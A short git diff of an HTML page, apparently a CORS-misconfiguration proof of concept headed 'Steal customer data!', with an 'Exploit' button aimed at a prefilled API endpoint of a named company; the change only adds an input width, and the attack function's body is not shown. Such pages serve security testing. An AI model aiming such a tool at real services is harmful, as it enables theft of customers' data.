--- a/cors.html
+++ b/cors.html
@@ -5,7 +5,7 @@
 <h3>Steal customer data!</h3>
 <html>
 <body>
-<input placeholder="https://api-uat.netinsights.veritas.com/appdetailinfolist" type="text" id="endpoint" />&nbsp;<button type='button' onclick='cors()'>Exploit</button>
+<input placeholder="https://api-uat.netinsights.veritas.com/appdetailinfolist" width=100 type="text" id="endpoint" />&nbsp;<button type='button' onclick='cors()'>Exploit</button>
 <p id='demo'></p>
 <script>
 function cors() {
